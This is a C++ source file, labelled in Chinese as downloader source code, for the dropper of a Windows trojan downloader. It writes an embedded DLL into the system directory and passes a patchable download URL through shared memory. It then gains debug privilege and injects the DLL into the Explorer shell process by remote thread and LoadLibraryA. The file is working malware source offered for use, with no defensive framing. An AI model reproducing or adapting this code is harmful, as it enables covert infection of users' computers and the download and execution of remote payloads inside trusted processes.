server.cpp

c++写得下载者源码

// server.cpp : Defines the entry point for the application.
//

#include "stdafx.h"

#include <stdio.h>
#include <windows.h>
bool EnableDebugPriv( char *Name);
bool InjectDll(char *ZiDllPath, DWORD Pid);


int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 	//互异
	HANDLE h=CreateMutex(NULL,FALSE,"fpx_2005_down");
	if(GetLastError()==ERROR_ALREADY_EXISTS)
		{
			return 0;
		}
   //地址和dll通过文件映射进行通信	
  char url[MAX_PATH]="http://fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff";
  HANDLE hmap=NULL;LPTSTR lp;
  hmap=CreateFileMapping((HANDLE)0xFFFFFFFF,NULL,PAGE_READWRITE,0,MAX_PATH,"myfile");
  lp=(LPTSTR)MapViewOfFile(hmap,FILE_MAP_ALL_ACCESS,0,0,0);
  strcpy(lp,url);
  UnmapViewOfFile(lp);

  char  DllPath1[MAX_PATH];
  DWORD dwWritten;
  GetSystemDirectory(DllPath1,MAX_PATH);
  strcat(DllPath1,"\\ssdll.dll");
  HRSRC hResInfo=FindResource(NULL,"dll","server");
  DWORD dwsize=SizeofResource(NULL,hResInfo);
  HGLOBAL hResData=LoadResource(NULL,hResInfo);
  HANDLE hfile=CreateFile(DllPath1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
  if(hfile==NULL)
	  return 0;
  WriteFile(hfile,(LPCVOID)LockResource(hResData),dwsize,&dwWritten,NULL);
  CloseHandle(hfile);
  
  DWORD Pid;

  //注入进程

 // HWND hWinPro=FindWindow("IEFrame",NULL);
    HWND hWinPro=::FindWindow("ProgMan",NULL);
    GetWindowThreadProcessId(hWinPro,&Pid);
 

  
  if(!InjectDll(DllPath1,Pid))
    {
        return 0;

    }

  return 1;
}


//---------------------------





bool EnableDebugPriv( char *Name)
{
   HANDLE hToken;
   TOKEN_PRIVILEGES tp;
   LUID Luid;
   if(!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
        &hToken))
        {
            
            //ShowMessage(  "openProcessToken error ");
            return false;
        }
   if(!LookupPrivilegeValue(NULL,Name,&Luid))
        {
             
            //ShowMessage(  "LookupPrivilegeValue error ");
            return false;

        }
   tp.PrivilegeCount=1;
   tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
   tp.Privileges[0].Luid=Luid;
   if(!AdjustTokenPrivileges(hToken,
        0,
        &tp,
        sizeof(TOKEN_PRIVILEGES),
        NULL,
        NULL))
        {
           
            //ShowMessage(  "AdjustTokenPrivileges error ");
            return false;
        }
   return true;

}


bool InjectDll(char *ZiDllPath, DWORD Pid)
{


   
   DWORD hLibModule;
   HANDLE hRemoteProcess;//进程句柄
   void *pDllName=0;
   PTHREAD_START_ROUTINE pfnAddr;
   HMODULE hKernel32=GetModuleHandle(TEXT("Kernel32"));
   char DllPath[MAX_PATH];
   strcpy(DllPath,ZiDllPath);
   
   const DWORD THREADSIZE=sizeof(DllPath);

   if(!EnableDebugPriv(SE_DEBUG_NAME))
        {
                
               // ShowMessage("addprivleg error");
                return false;
        }

   //    hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS,false,Pid);也可以
   if((
       hRemoteProcess=OpenProcess(
       PROCESS_CREATE_THREAD|
       PROCESS_VM_OPERATION| 
       PROCESS_VM_WRITE|     
       PROCESS_VM_READ|      
       PROCESS_QUERY_INFORMATION,
       false,
       Pid)
       )==NULL)
      {
                
                //ShowMessage("OpenProcess() error.");
                return false;

      }

   
  
   if((pDllName=::VirtualAllocEx(hRemoteProcess,
        0,
        THREADSIZE,
        MEM_COMMIT|MEM_RESERVE,
        PAGE_EXECUTE_READWRITE))
        ==NULL)
       {
              
              // ShowMessage("VirtualAlloc error.");
               return false;
       }

  

      if(!::WriteProcessMemory(hRemoteProcess,
                                pDllName,
                                ( void *)DllPath,
                                
                                THREADSIZE,
                                NULL))

         {
                
                // ShowMessage("WriteProcessMemory error."+GetLastError());
                 return false;

        }

   //计算LoadLibraryA的入口地址

      if((pfnAddr=(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32,"LoadLibraryA"))
          ==NULL)
        {
              
                // ShowMessage("GetProcAddress error."+GetLastError());
                 return false;
        }
        HANDLE hRemoteThread;
        DWORD ThreadId;

       
        hRemoteThread=::CreateRemoteThread
               (hRemoteProcess,
                NULL,
                0,
                pfnAddr,
                pDllName,
                0,
                &ThreadId);

        if(hRemoteThread==NULL)
               
        {
                
                // ShowMessage("CreateRemoteThread error."+GetLastError());
                 return false;
        }

        
       //不用Sleep程序会关闭表示等待时间这里没写好
	   Sleep(10000);
       WaitForSingleObject(hRemoteThread,INFINITE);
       GetExitCodeThread(hRemoteThread,&hLibModule);
       //扫尾     DllPath    THREADSIZE
       CloseHandle(hRemoteThread);
       VirtualFreeEx(hRemoteProcess,pDllName,THREADSIZE,MEM_RELEASE);
       hRemoteThread=CreateRemoteThread(hRemoteProcess,
                NULL,
                0,
                (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32,"FreeLibrary"),
                (void *)hLibModule,
                0,NULL);
       WaitForSingleObject(hRemoteThread,INFINITE);
       GetExitCodeThread( hRemoteThread, &hLibModule );
       CloseHandle(hRemoteThread);
       CloseHandle(hRemoteProcess );
      
      return TRUE;

}
//-------------------------------------------------------